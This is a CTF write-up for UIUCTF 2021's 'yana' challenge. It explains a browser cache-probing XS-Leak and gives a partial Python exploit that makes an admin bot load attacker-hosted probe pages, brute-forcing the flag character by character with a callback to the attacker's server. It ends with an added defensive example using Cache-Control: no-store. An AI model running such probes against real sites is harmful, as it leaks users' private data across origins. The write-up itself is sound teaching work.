The time a browser takes to load a resource file differs between the first load and the second. The reason is that on the second fetch the image is served from the browser's disk cache rather than being requested from the web server again.
The screenshot on the right is the first load of the image, and the one on the left is the second load. Looking at the timings, the difference is 0ms : 48ms. So how can we use this for an XS-Leak?
Exploit (Web) UIU CTF 2021 - yana [342 pts]
The challenge is to leak the flag using cache probing and XS-Leak :)
If you open the challenge, you can see a notepad function as shown above. I checked: the form at the top saves a memo, and the one at the bottom searches the saved memos.
So I saved memos as pocas and not_pocas. After saving them, I searched for pocas on the left and for asdf on the right.
OMG, the search came back with a surprising result!! Each query immediately returned an image of a different color!! This gives us an important piece of information.
Information
If you search for a currently saved memo, a green image appears.
If you search for an unsaved memo, a red image appears.
/* NOTE: this is the script that the admin bot runs to visit your provided URL. It is not required to solve the challenge, but is provided for reference & for you to help test/debug your exploit */
It reads the /flag.txt file and saves it in the FLAG variable.
It starts a Chrome instance using playwright-chromium.
It goes to https://chal.yana.wtf, saves FLAG as a note, and then, as the administrator, visits the URL we submitted. ( Important )
We learned a lot from our analysis !!
From bot.js we know the flag is stored in a note, and we also know the flag format ( uiuctf{[a-z0-9_]} ). That is, we can brute force it character by character starting from uiuctf{. This is where 'Cache Probing' comes in: when I search for a value contained in a note, a green image appears.
So if we query a value contained in the note, the browser loads the green image. Since it is loaded for the first time, it is written to the disk cache. If we then load the green image once more, it comes back much faster than the first time because it is already cached.
First, this is the exploit code for sending a query that is not saved in the memo. In that situation the browser loads the red image, and the green image, which has not been loaded yet, will take a long time the first time it is requested.
Let’s check it out.
Nice. When sending a query that is not contained in a note, it took about 43ms.
import string
from time import sleep
from flask import Flask, request
from pwn import remote, log

app = Flask(__name__)

# Brute force one character at a time, starting from the known prefix.
# Charset follows the flag format uiuctf{[a-z0-9_]}.
FLAG = 'uiuctf{'
char_list = string.ascii_lowercase + string.digits + '_'
condition = True

# Placeholders: the admin bot's address and the attacker-hosted probe page.
bot_url = 'BOT_HOST'
bot_port = 0
poc_url = 'http://EXPLOIT_SERVER/?flag='


@app.route('/flag')
def index():
    # Callback hit by the probe page with the flag prefix it confirmed.
    global FLAG, condition
    FLAG = request.args.get('flag')
    condition = False
    log.info("Success!")
    log.info(f'The flag is : {FLAG}')
    return "Success"


def send_bot():
    global condition
    for char in char_list:
        if condition:
            bot = remote(bot_url, bot_port, level='error')
            # Build the URL as text, then encode once (the original mixed str and bytes).
            url = (poc_url + FLAG + char).encode('utf-8')
            #log.info(f'Send url : {url}')
            sleep(1)
            bot.sendlineafter(b'Please send me a URL to open.\n', url)
        else:
            exit(0)
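The defensive fix for this class of leak, as an added example that is not the challenge's or the author's code: the search result image is a state-dependent resource, so it must never be written to the HTTP cache. The stand-in server below mimics the notes search (green image when the query is contained in a note, red otherwise; NOTES, GREEN and RED are constructed placeholders, and substring matching is assumed from the write-up) and answers with Cache-Control: no-store, so a repeat load is served by the server again and the first-load/second-load timing gap disappears.

```python
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import parse_qs, urlparse
from urllib.request import urlopen

NOTES = {"pocas", "not_pocas"}           # constructed sample note store
GREEN = b"\x89PNG green-placeholder"      # constructed stand-ins for the two result images
RED = b"\x89PNG red-placeholder"

def result_headers():
    """Headers for a state-dependent resource: forbid storing it in any HTTP cache,
    so a repeat load must go back to the server instead of being read from disk."""
    return {"Content-Type": "image/png",
            "Cache-Control": "no-store, max-age=0", "Pragma": "no-cache"}

def search_response(query):
    """Mirror the challenge's behaviour: green if the query is contained in a note."""
    hit = any(query in note for note in NOTES)
    return (GREEN if hit else RED), result_headers()

class SearchHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        query = parse_qs(urlparse(self.path).query).get("q", [""])[0]
        body, headers = search_response(query)
        self.send_response(200)
        for name, value in headers.items():
            self.send_header(name, value)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):  # keep the demo quiet
        pass

def start_server():
    # Ephemeral loopback port, background thread; returns the port to query.
    server = HTTPServer(("127.0.0.1", 0), SearchHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server.server_address[1]

def fetch(port, query):
    # What a browser sees: the image bytes and the cache policy attached to them.
    with urlopen(f"http://127.0.0.1:{port}/search?q={query}") as resp:
        return resp.read(), resp.headers.get("Cache-Control", "")

if __name__ == "__main__":
    port = start_server()
    for q in ("pocas", "asdf"):
        print(q, *fetch(port, q))
```

no-store closes only the browser-cache channel; a server-side difference in response time or size between the green and red paths is a separate channel and has to be checked on its own.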